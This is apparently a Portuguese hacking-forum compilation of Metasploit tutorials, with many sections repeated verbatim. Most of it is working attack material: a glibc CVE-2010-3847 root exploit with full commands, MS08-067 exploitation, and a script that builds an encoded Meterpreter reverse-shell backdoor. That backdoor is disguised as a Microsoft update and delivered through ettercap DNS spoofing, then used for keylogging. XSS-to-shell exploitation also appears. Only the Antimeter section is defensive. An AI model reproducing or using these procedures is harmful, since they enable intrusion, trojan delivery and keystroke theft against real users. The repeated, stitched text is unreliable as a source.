É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit.
Atualize MPGe - um invólucro de msfpayload e msfencode do Metasploit.
MPGe é um invólucro de msfpayload e msfencode do Metasploit. É
possível usá-lo com Backtrack e Backbox.This wrapper cria cavalos de
tróia para o Microsoft Windows, Linux, Mac OS X Panther, Tiger e Leopard
Lion. Para
Mac OS X é possível criar um shell reverso clássico ou criar um shell
reverso inserido em um pacote. Pkg ou criar arquivos. App. Eu
tento o meu programa depois entre duas máquinas virtuais: Primeiro
anfitrião Mac Book (preto) e segundo host virtual Windows XP. Antes
de eu usar o meu programa entre dois reais Mac OS X: O Livro primeiro
Mac (preto) eo segundo Mac iBook G4 PowerPC (branco) com OS Tiger. Estes dois foram Mac conectados à rede local (intranet). Mac OS X Livro (preto) está em ouvir e esperar o shell reverso. O
segundo mac osx Mac iBook G4 PowerPC receber um pacote (um pacote de
arquivos. Ou. Dmg) e quando o usuário clica no arquivo de inserir uma
senha como root e ativar o shell shell.The reversa reversa com script
mal é um jogo não necessariamente muito sucesso não se preocupe.
![]() |
Plataforma: Unix / Linux |
- Por favor, revisão README:https://docs.google.com/file/d/0B_3ImxRO_MZyaFdqR3lVc1pUSWVqWm9lcnI4czY3UQ/edit?pli=1
- Testes em iMac Mac OS X Lion e Mac Book com conexão sem fio Wi-Fi
- Insira Opções e status de IP em Reviews de usuários
--------------------------------------------------------------------------------------------------------------------------------------
hacking Google via metasploit
foi muito horrível para a Microsoft. Primeiro, a vulnerabilidade aurora
no IE e depois que o problema local de privilégio escalada em todas as
janelas do sistema. As imagens abaixo mostram a combinação de duas
vulnerabilidades para obter acesso a uma máquina e depois que escalaste
privs para o sistema ...




mais imagens disponíveis em "Hacking Google the Metasploit way" oder "from Aurora to god with msf" | www.s3cur1ty.de
hf
m-1-k-3
mais imagens disponíveis em "Hacking Google the Metasploit way" oder "from Aurora to god with msf" | www.s3cur1ty.de
hf
m-1-k-3
Remote Desktop com VNC via metasploit
Mostro com acessar um desktop remotamente com VNC via metasploit uma de muitas ferramentas encontradas no metasploit.
O que eu fiz?
Configurei o metasploit para injetar uma carga vncinject usando o exploit ms08_067_netapi
O que eu fiz?
Configurei o metasploit para injetar uma carga vncinject usando o exploit ms08_067_netapi
Código:
use exploit/windows/smb/ms08_067_netapi
set RHOST IP_da_vitima
set PAYLOAD windows/vncinject/bind_tc
exploit-
Baixar
set RHOST IP_da_vitima
set PAYLOAD windows/vncinject/bind_tc
exploit-
Antimeter Tool - Anti Meterpreter (Metasploit) for Windows
Link: Aqui ou http://www.mertsarica.com/codes/antimeter2.zip
USO
Argumentos Opcionais:
-t [intervalo de tempo] Varre a memória em cada intervalo de tempo especificado (Padrão intervalo de tempo é um (1) minuto)
-a Automaticamente mata o processo Meterpreter (desativado por padrão)
-d Apenas detecta o processo Meterpreter (desativado por padrão)
-e Adiciona processo para a lista de exclusão (por exemplo, uma "blacklist")
EXEMPLOS
Varre a memória em cada 5 minutos, mata o processo Meterpreter automaticamente e é habilitado o modo verbose:
Varre a memória em cada minuto e só detecta o processo Meterpreter:
Varre a memória em cada minuto, sendo os processos "explorer e winlogon" são excluídos da análise:
Ai a pergunta? Porque usar uma ferramenta dessas, sendo que eu uso Linux ou Mac, por exemplo?
A resposta é "PORQUE SIM!!!", deixando as zoeira de lado, quando você tem ambientes heterogênios e grandes, há uma grande tendência para ter servers e desktops Windows.
Então se for o caso está ai uma solução, para um SO tão fraco quanto Windows (no caso ele mesmo!)
USO
Código:
antimeter.exe [argumentos]
Argumentos Opcionais:
-t [intervalo de tempo] Varre a memória em cada intervalo de tempo especificado (Padrão intervalo de tempo é um (1) minuto)
-a Automaticamente mata o processo Meterpreter (desativado por padrão)
-d Apenas detecta o processo Meterpreter (desativado por padrão)
-e Adiciona processo para a lista de exclusão (por exemplo, uma "blacklist")
EXEMPLOS
Varre a memória em cada 5 minutos, mata o processo Meterpreter automaticamente e é habilitado o modo verbose:
Código:
antimeter.exe -t 5 -a -v
Varre a memória em cada minuto e só detecta o processo Meterpreter:
Código:
antimeter.exe -n
Varre a memória em cada minuto, sendo os processos "explorer e winlogon" são excluídos da análise:
Código:
antimeter.exe -e explorer.exe,winlogon.exe
Ai a pergunta? Porque usar uma ferramenta dessas, sendo que eu uso Linux ou Mac, por exemplo?
A resposta é "PORQUE SIM!!!", deixando as zoeira de lado, quando você tem ambientes heterogênios e grandes, há uma grande tendência para ter servers e desktops Windows.
Então se for o caso está ai uma solução, para um SO tão fraco quanto Windows (no caso ele mesmo!)
Exploit no pacote glibc-2.5.49.el5_5.i686 CVE-2010-3847 escala de privilegios p/ root
Executando o exploit no pacote
glibc-2.5.49.el5_5.i686 CVE-2010-3847 escala de privilégios -> root
em qualquer Linux sem uso do Metasploit.
A falha que estou falando é notícia no site underlinux.org
Privilégios de Root Através de Vulnerabilidade na Biblioteca GNU C e maiores detalhes em:
https://bugzilla.redhat.com/show_bug.cgi?id=643306 e em CVE-2010-3847 - Advisories - Community, pois até a data deste artigo a pedido do fabricante não liberam no CVE, mais informações
OBS: Testado e comprovado com sucesso em VM local que produzi em LAB, mas não utilizando a produção ou derivados. Tenha cuidado.
O autor deste artigo não se responsabiliza por dados mediante este artigo ou derivados.
PoC Exploit (Proof of Concept Exploit)
Crie um usuário teste, set a senha e depois autentique com o mesmo
Mitigação
========
Evitar de criar usuários em filesystems sem permissão nosuid
Caso não seja possível, há um paleativo:
Solução
=======
Atualizar glibc-2.5.49.el5_5.i686 -> com yum update caso já haja glibc atual.
Foi exploitado sem sucesso em uma VM Local no CentOS 5.5, sem sucesso. O que pude concluir que a atualização da glibc contorna a falha, mas deve-se avaliar melhor e com cautela, pois a atualização da glibc, sem total atualização do SO de CentOS 5.3 -> CentOS 5.5 pode o acarretar em “crash” total do SO, devido à esta biblioteca ser uma das principais do SO.
A falha que estou falando é notícia no site underlinux.org
Privilégios de Root Através de Vulnerabilidade na Biblioteca GNU C e maiores detalhes em:
https://bugzilla.redhat.com/show_bug.cgi?id=643306 e em CVE-2010-3847 - Advisories - Community, pois até a data deste artigo a pedido do fabricante não liberam no CVE, mais informações
OBS: Testado e comprovado com sucesso em VM local que produzi em LAB, mas não utilizando a produção ou derivados. Tenha cuidado.
O autor deste artigo não se responsabiliza por dados mediante este artigo ou derivados.
PoC Exploit (Proof of Concept Exploit)
Crie um usuário teste, set a senha e depois autentique com o mesmo
Código:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ls -l /proc/$$/fd/3
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system(“/bin/bash”);
}
^D
(Ctrl+D) <— parte as teclas para salvar e sair
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
$ LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3
# whoami
root
id
uid=0(root) gid=500(teste)
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ls -l /proc/$$/fd/3
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system(“/bin/bash”);
}
^D
(Ctrl+D) <— parte as teclas para salvar e sair
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
$ LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3
# whoami
root
id
uid=0(root) gid=500(teste)
Mitigação
========
Evitar de criar usuários em filesystems sem permissão nosuid
Caso não seja possível, há um paleativo:
Citação:
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp
Solução
=======
Atualizar glibc-2.5.49.el5_5.i686 -> com yum update caso já haja glibc atual.
Foi exploitado sem sucesso em uma VM Local no CentOS 5.5, sem sucesso. O que pude concluir que a atualização da glibc contorna a falha, mas deve-se avaliar melhor e com cautela, pois a atualização da glibc, sem total atualização do SO de CentOS 5.3 -> CentOS 5.5 pode o acarretar em “crash” total do SO, devido à esta biblioteca ser uma das principais do SO.
"Encobrindo" um backdoor do meterpreter em um Patch do IE
Aqui está um tutorial sobre como criar um backdoor
no Meterpreter indetectável e encobri-lo como uma atualização de
segurança do Internet Explorer. Eu criei um script bem básico que cria o
backdoor no Meterpreter e inicia o multi/handler.
Vou injetar o payload no Microsoft Windows Malicious Software Removal Tool, que está disponível para download aqui. ou Download details: Microsoft® Windows® Malicious Software Removal Tool (KB890830)
E eu vou usar o ettercap para fazer dns_spoof na vítima usando uma página falsa do Internet Explorer que seria equivalente à atualização de segurança.
Salve meu script como myscript.sh:
Faça o meu script ser executável:
Execute o meu script:
Set up portforwarding no sysctrl do seu kernel (se for em outra localização do seu kernel, procure na internet algo sobre kernel e versão no Ubuntu)
Set up etter.dns localizado em /usr/share/ettercap
Remova a parte onde microsoft esta forwarded para o linux e adicione as seguintes linhas:
Crie um local onde você pode baixar o arquivo ex: mega.co.nz - sendspace - dropbox
Eu usei o Photoshop para editar algumas fotos que eu encontrei a respeito do Internet Explorer,
Criei uma página simples em html, adicionei uma folha de estilo - CSS para posicionar o botão de download e para fazer a página parecer o mesmo com todas as resolução da tela.
Copie todos os arquivos para o diretório de publicação padrão do Apache /var/www/
Restart o Apache:
Ative o DNS spoofing:
Gateway IP pode ser encontrado digitando isso no terminal:
Agora só temos que esperar a nossa vítima para executar o backdoor. Quando a vítima executar o backdoor, você deve ver algo como "session 1 opened". Você pode ver suas sessões ativas, digitando:
OBS: Isso se deve devido o backdoor ter sido criado no Metasploit/Meterpreter, então é o comando acima que visualiza as sessões do mesmo, bem como quase todos os comandos na sequência abaixo. Para saber mais sobre Metasploit/Meterpreter busque no nosso forum, fale com firebits, espreto, spwam, bhio e outros membros, mas seja "claro e objetivo" nas suas perguntas e post sempre no nosso forum.
Você pode saltar para a primeira sessão, digitando:
Há uma série de comandos que são capazes de executar. Você pode vê-los todos, escrevendo:
Alguns exemplos:
Vou injetar o payload no Microsoft Windows Malicious Software Removal Tool, que está disponível para download aqui. ou Download details: Microsoft® Windows® Malicious Software Removal Tool (KB890830)
E eu vou usar o ettercap para fazer dns_spoof na vítima usando uma página falsa do Internet Explorer que seria equivalente à atualização de segurança.
Salve meu script como myscript.sh:
Código:
#!/bin/sh
clear
cd /pentest/exploits/framework3
echo "*************************************"
echo " creating a meterpreter backdoor "
echo "*************************************"
echo -n "lhost ?"
read lhost
echo -n "lport?"
read lport
echo -n "path to output file?"
read filename
echo -n "path to input file?"
read originalfile
echo "creating payload ..."
./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x $originalfile -o $filename
echo "payload created !"
echo "starting multi/handler ..."
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E
clear
cd /pentest/exploits/framework3
echo "*************************************"
echo " creating a meterpreter backdoor "
echo "*************************************"
echo -n "lhost ?"
read lhost
echo -n "lport?"
read lport
echo -n "path to output file?"
read filename
echo -n "path to input file?"
read originalfile
echo "creating payload ..."
./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x $originalfile -o $filename
echo "payload created !"
echo "starting multi/handler ..."
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E
Faça o meu script ser executável:
Código:
chmod 755 myscript.sh
Execute o meu script:
Código:
./myscript.sh lhost => your ip lport => 5555 output => /root/backdoor.exe input => /root/windows-kb890830-v3.12
Set up portforwarding no sysctrl do seu kernel (se for em outra localização do seu kernel, procure na internet algo sobre kernel e versão no Ubuntu)
Código:
echo 1 > /proc/sys/net/ipv4/ip_forward
Set up etter.dns localizado em /usr/share/ettercap
Código:
nano /usr/share/ettercap/etter.dns
Remova a parte onde microsoft esta forwarded para o linux e adicione as seguintes linhas:
Código:
* A Seu Ip
*.* A Seu Ip *.*.* A Seu Ip *.*.*.* A Seu Ip
*.* A Seu Ip *.*.* A Seu Ip *.*.*.* A Seu Ip
Crie um local onde você pode baixar o arquivo ex: mega.co.nz - sendspace - dropbox
Eu usei o Photoshop para editar algumas fotos que eu encontrei a respeito do Internet Explorer,
Criei uma página simples em html, adicionei uma folha de estilo - CSS para posicionar o botão de download e para fazer a página parecer o mesmo com todas as resolução da tela.
Copie todos os arquivos para o diretório de publicação padrão do Apache /var/www/
Restart o Apache:
Código:
/etc/init.d/apache2 restart
Ative o DNS spoofing:
Código:
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /ip da vitima/ /gateway ip/
Gateway IP pode ser encontrado digitando isso no terminal:
Código:
route -n
Agora só temos que esperar a nossa vítima para executar o backdoor. Quando a vítima executar o backdoor, você deve ver algo como "session 1 opened". Você pode ver suas sessões ativas, digitando:
Código:
sessions -r
OBS: Isso se deve devido o backdoor ter sido criado no Metasploit/Meterpreter, então é o comando acima que visualiza as sessões do mesmo, bem como quase todos os comandos na sequência abaixo. Para saber mais sobre Metasploit/Meterpreter busque no nosso forum, fale com firebits, espreto, spwam, bhio e outros membros, mas seja "claro e objetivo" nas suas perguntas e post sempre no nosso forum.
Você pode saltar para a primeira sessão, digitando:
Código:
sessions -i 1
Há uma série de comandos que são capazes de executar. Você pode vê-los todos, escrevendo:
Código:
help
Alguns exemplos:
Citação:
sysinfo => get system info
shell => jump into a cmd shell
keyscan_start => scan for keyboard input
keyscan_dump => dump keyboard input
keyscan_stop => stop scanning
screenshot => take screenshot
upload
download
shell => jump into a cmd shell
keyscan_start => scan for keyboard input
keyscan_dump => dump keyboard input
keyscan_stop => stop scanning
screenshot => take screenshot
upload
download
Explorando Cross Site Scripting (XSS) com Metasploit
Cross Site Scripting é uma vulnerabilidade
encontrada em aplicações, que existe quando a mesma não implementa
mecanismos de validação de entradas dos dados fornecidos pelos usuários à
aplicação. Existem casos em que a validação existe, porém, não é
suficiente ou bem implementada, permitindo desta forma a possibilidade
de executar scripts no browser do usuário.
Os ataques que exploram esta vulnerabilidade, na grande maioria dos casos, visam comprometer a segurança do usuário que utiliza a aplicação, conhecido como ataques client-side. Estes ataques incluem, captura de cookies de sessão, dados dos usuários, credenciais, criação de sites falsos (phishing), entre outros.
No Metasploit existe um framework ainda em fase de testes chamado XSSF, criado para facilitar a exploração de Cross Site Scripting, realizei uns testes bastantes satisfatórios, onde foi possível conseguir desde informações do navegador do usuário até a exploração de vulnerabilidades do browser com execução de comandos.
Para utilizar o framework é necessário fazer o download Aqui ou https://dev.metasploit.com/redmine/attachments/596/XSSF.zip e extrair o arquivo dentro do diretório do Metasploit.
Tendo extraído o arquivo, basta executar a console do Metasploit e utilizar o comando load, conforme imagem ilustra.
Quando executado o XSSF habilita um Web server contendo um código javascript que deverá ser executado no browser da vítima, sendo assim ele gera uma URL para uso de engenharia social, onde o atacante deve fornecer para o usuário. Neste caso a URL gerada foi: http://192.168.2.103:8888/loop.
Para demonstração foi utilizado uma vulnerabilidade de XSS encontrado na aplicação Web Damn Vulnerable Web App (DVWA) e executado a injeção do script.
Para verificar se o código foi executado no browser do usuário, executa-se o comando “xssf_active_victms”
Verificou-se que existe uma conexão ativa oriunda do browser Internet Explorer, com o comando “xssf_information”, é possível obter mais informações.
O framework possui alguns módulos onde é possível interagir com o browser atacado. Nas imagens abaixo é possível verificar o uso do módulo auxiliary/xssf/alert.
Após a execução do módulo é possível verificar no browser do usuário a janela do alert executado.
Bem desta forma é possível obter outras informações tais como cookies de sessão, acesso ao clipboard entre outros.
Dado o nível de interação existente com o browser do usuário, é possível ainda executar exploits para explorar vulnerabilidades client-side.
Para exemplificar foi disparado contra o browser do usuário o exploit ms10_046_shortcut_icon_dllloader. As imagens ilustram a configuração e execução do exploit.
Desta forma, é possível verificar que o exploit foi executado com sucesso e retornou para o atacante uma shell para execução de comandos.
Com este post é possível mostrar o quanto um simples Cross Site Scripting refletido pode se tornar perigoso devido as grandes investidas contra a segurança client-side.
Os ataques que exploram esta vulnerabilidade, na grande maioria dos casos, visam comprometer a segurança do usuário que utiliza a aplicação, conhecido como ataques client-side. Estes ataques incluem, captura de cookies de sessão, dados dos usuários, credenciais, criação de sites falsos (phishing), entre outros.
No Metasploit existe um framework ainda em fase de testes chamado XSSF, criado para facilitar a exploração de Cross Site Scripting, realizei uns testes bastantes satisfatórios, onde foi possível conseguir desde informações do navegador do usuário até a exploração de vulnerabilidades do browser com execução de comandos.
Para utilizar o framework é necessário fazer o download Aqui ou https://dev.metasploit.com/redmine/attachments/596/XSSF.zip e extrair o arquivo dentro do diretório do Metasploit.
Tendo extraído o arquivo, basta executar a console do Metasploit e utilizar o comando load, conforme imagem ilustra.
Quando executado o XSSF habilita um Web server contendo um código javascript que deverá ser executado no browser da vítima, sendo assim ele gera uma URL para uso de engenharia social, onde o atacante deve fornecer para o usuário. Neste caso a URL gerada foi: http://192.168.2.103:8888/loop.
Para demonstração foi utilizado uma vulnerabilidade de XSS encontrado na aplicação Web Damn Vulnerable Web App (DVWA) e executado a injeção do script.
Para verificar se o código foi executado no browser do usuário, executa-se o comando “xssf_active_victms”
Verificou-se que existe uma conexão ativa oriunda do browser Internet Explorer, com o comando “xssf_information”, é possível obter mais informações.
O framework possui alguns módulos onde é possível interagir com o browser atacado. Nas imagens abaixo é possível verificar o uso do módulo auxiliary/xssf/alert.
Após a execução do módulo é possível verificar no browser do usuário a janela do alert executado.
Bem desta forma é possível obter outras informações tais como cookies de sessão, acesso ao clipboard entre outros.
Dado o nível de interação existente com o browser do usuário, é possível ainda executar exploits para explorar vulnerabilidades client-side.
Para exemplificar foi disparado contra o browser do usuário o exploit ms10_046_shortcut_icon_dllloader. As imagens ilustram a configuração e execução do exploit.
Desta forma, é possível verificar que o exploit foi executado com sucesso e retornou para o atacante uma shell para execução de comandos.
Com este post é possível mostrar o quanto um simples Cross Site Scripting refletido pode se tornar perigoso devido as grandes investidas contra a segurança client-side.
Explorando a Vulnerabilidade MS08-067
Esse é um tutorial que é bem básico, mas é essencial para que no futuro possamos estudar mais a fundo os recursos do Metasploit.
O cenário para este ataque é uma máquina rodando linux com o Metasploit instalado e uma com o Windows XP SP1 vulnerável a MS08_067_netapi.
Com as máquinas na mesma rede, vamos ver o ip de cada uma delas.
Na máquina linux basta dar um ifconfig

Na máquina windows abra uma tela de prompt e de um ipconfig

Agora vamos inicar o Metasploit, dando o comando msfconsole

Como já sabemos qual a vulnerabilidade que vamos explorar, vamos fazer uma busca no Metasploit e descobrir o caminho correto do exploit. Para isso vamos usar o comando search ms08_067_netapi

Pronto, ele nos retornou o caminho, agora vamos selecionar o exploit usando o seguinte comando use exploit/windows/smb/ms08_067_netapi

Vamos agora definir o PAYLOAD que vamos utilizar, neste caso eu vou usar uma conexão reversa então use o comando set PAYLOAD windows/meterpreter/reverse_tcp para definir este PAYLOAD.

Precisamos ver quais parametros nosso exploit vai precisar para atacar a máquina alvo, para isso usaremos o comando show options

Podemos ver claramente na coluna Current Setting que existem dois valores ainda não definidos e que são necessários, que são o RHOST e o LHOST. Vamos definir o LHOST que é nosso IP local, então o comando fica assim set LHOST 10.0.0.7

Para definir o RHOST daremos o seguinte comando set RHOST 10.0.0.8 lembrando que o IP da máquina alvo é 10.0.0.8

Vamos dar novamente o comando show options para ver se ficou faltando algum parametro

Bem como parece estar tudo ok, vamos lançar nosso exploit e ver se da certo. Para isso basta digitar exploit

Show ! Aqui podemos ver que uma sessão foi aberta, isso quer dizer que o alvo foi invadido com sucesso.
Bem esse é o primeiro passo para o estudo do metasploit
O cenário para este ataque é uma máquina rodando linux com o Metasploit instalado e uma com o Windows XP SP1 vulnerável a MS08_067_netapi.
Com as máquinas na mesma rede, vamos ver o ip de cada uma delas.
Na máquina linux basta dar um ifconfig
Na máquina windows abra uma tela de prompt e de um ipconfig
Agora vamos inicar o Metasploit, dando o comando msfconsole
Como já sabemos qual a vulnerabilidade que vamos explorar, vamos fazer uma busca no Metasploit e descobrir o caminho correto do exploit. Para isso vamos usar o comando search ms08_067_netapi
Pronto, ele nos retornou o caminho, agora vamos selecionar o exploit usando o seguinte comando use exploit/windows/smb/ms08_067_netapi
Vamos agora definir o PAYLOAD que vamos utilizar, neste caso eu vou usar uma conexão reversa então use o comando set PAYLOAD windows/meterpreter/reverse_tcp para definir este PAYLOAD.
Precisamos ver quais parametros nosso exploit vai precisar para atacar a máquina alvo, para isso usaremos o comando show options
Podemos ver claramente na coluna Current Setting que existem dois valores ainda não definidos e que são necessários, que são o RHOST e o LHOST. Vamos definir o LHOST que é nosso IP local, então o comando fica assim set LHOST 10.0.0.7
Para definir o RHOST daremos o seguinte comando set RHOST 10.0.0.8 lembrando que o IP da máquina alvo é 10.0.0.8
Vamos dar novamente o comando show options para ver se ficou faltando algum parametro
Bem como parece estar tudo ok, vamos lançar nosso exploit e ver se da certo. Para isso basta digitar exploit
Show ! Aqui podemos ver que uma sessão foi aberta, isso quer dizer que o alvo foi invadido com sucesso.
Bem esse é o primeiro passo para o estudo do metasploit